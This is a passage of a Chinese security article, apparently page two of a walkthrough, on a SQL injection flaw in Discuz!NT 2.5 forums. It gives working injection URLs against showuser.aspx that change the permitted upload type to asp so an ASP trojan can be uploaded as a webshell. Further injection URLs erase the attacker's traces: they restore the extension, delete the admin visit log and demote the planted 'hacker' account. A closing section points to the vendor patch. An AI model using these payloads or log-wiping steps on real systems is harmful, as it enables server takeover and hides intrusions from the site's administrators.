WEB开发网
开发学院网络安全安全技术 Discuz!NT 2.5最新注入漏洞测试 阅读

Discuz!NT 2.5最新注入漏洞测试

 2008-09-05 13:21:03 来源:WEB开发网   
核心提示: hacker被提升为管理员后就可以登录系统后台进行各种操作了,Discuz!NT的后台功能确实比较强大,Discuz!NT 2.5最新注入漏洞测试(2),(图5)4、更改上传格式该漏洞除了可以提升管理员为,还可以更改默认的附件上传格式,希望通过此文,能够引起大家对该漏洞的重视,默认情况下,

Discuz!NT 2.5最新注入漏洞测试

Discuz!NT 2.5最新注入漏洞测试

hacker被提升为管理员后就可以登录系统后台进行各种操作了。Discuz!NT的后台功能确实比较强大,(图5)

Discuz!NT 2.5最新注入漏洞测试

4、更改上传格式

该漏洞除了可以提升管理员为,还可以更改默认的附件上传格式。默认情况下,Discuz!NT只支持jpg,gif,png,zip,rar,jpeg格式的附件上传,利用该漏洞可以将其中的某种格式替换为asp、aspx等可执行脚本的格式,从而获得一个Webshell。我们可以构造URL更改其上传文件格式,比如我们将jgp格式更改为aspx格式,就可以构造这样的URL“http://www.gslw.com/showuser.aspx?ordertype=desc;update dnt_attachtypes set extension='asp' where extension='jpg';--” ,最终的执行效果见图6。(图6)

Discuz!NT 2.5最新注入漏洞测试

5、获得Webshell

通过上面的操作我们就可以在任意一论坛版块下发表新主题 ,然后通过附件上传功能将以asp木马上传到服务器。上传完成后,在“我的附件”项下可以找到上传的asp木马,点击该asp网马就直接运行,登录后获得一个webshell。(图7)

Discuz!NT 2.5最新注入漏洞测试

6、清除痕迹

获得webshell后,就可以通过该漏洞构造URL清除痕迹,恢复Discuz!NT的默认状态。主要包括一下几项:

http://www.gslw.com/showuser.aspx?ordertype=desc;update dnt_attachtypes set extension='jpg' where extension='asp';-- 改回jpg格式

http://www.gslw.com/showuser.aspx?ordertype=desc;delete from dnt_adminvisitlog where username='hacker';-- 清除日志

http://www.gslw.com/showuser.aspx?ordertype=desc;update dnt_users set adminid='',groupid='' where username='hacker';-- hacker降权限

7、总结及防范

从上面的演示可以看到该漏洞对采用Discuz!NT的BBS威胁极大,攻击者不仅能够进入后台,而且可以获取webshell,进而渗透控制服务器。笔者上面演示用的是asp木马,如果用aspx木马其权限将更大,拿下服务器将会更容易。

针对此漏洞Discuz!NT官方提供了补丁,该补丁的地址为:

http://download.comsenz.com/DiscuzNT/patch/dnt_25_n2_patch20080829.zip

修正方法是将压缩包中的Discuz.Web.dll文件上传到bin目录,覆盖掉以前的文件。虽然Discuz!NT比较迅速地发布了补丁,但是笔者在此刻进行了安全测试,有相当多的采用Discuz!NT 2.5系统的BBS论坛依旧没有打该补丁。希望通过此文,能够引起大家对该漏洞的重视,尽快修复漏洞。

上一页  1 2 

Tags:Discuz NT

编辑录入:爽爽 [复制链接] [打 印]
赞助商链接